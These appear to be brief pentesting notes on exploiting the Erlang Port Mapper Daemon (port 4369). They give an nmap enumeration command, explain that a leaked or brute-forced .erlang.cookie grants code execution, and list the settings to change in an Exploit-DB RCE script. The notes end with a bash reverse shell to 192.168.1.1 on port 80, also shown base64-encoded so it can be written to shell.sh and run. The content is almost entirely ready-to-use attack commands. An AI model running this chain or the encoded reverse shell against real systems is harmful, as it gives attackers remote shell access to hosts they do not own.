# Erlang - 4369

<https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd>

```
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2

4369/tcp  open   epmd       Erlang Port Mapper Daemon
| epmd-info: 
|   epmd_port: 4369
|   nodes: 
|_    rabbit: 65000
65000/tcp open   unknown
```

### Erlang Cookie RCE

If you can **leak the Authentication cookie** you will be able to execute code on the host. Usually, this cookie is located in **\~/.erlang.cookie** and is generated by erlang at the first start.

There is a epmd port. And rabbit service on 65000 port. We need to rce we need erlang.cookie value. We can brute force it or we can find it via another services on the host.

```
.erlang.cookie
JFKERIPLFKVJSQRDIXJS
```

### Erlang Cookie - Remote Code Execution

<https://www.exploit-db.com/exploits/49418>

```
$ python3 49418
```

We need to change relevant parts of the code.

```
TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"
```

```
/bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1 - Base64 encoded

CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"
```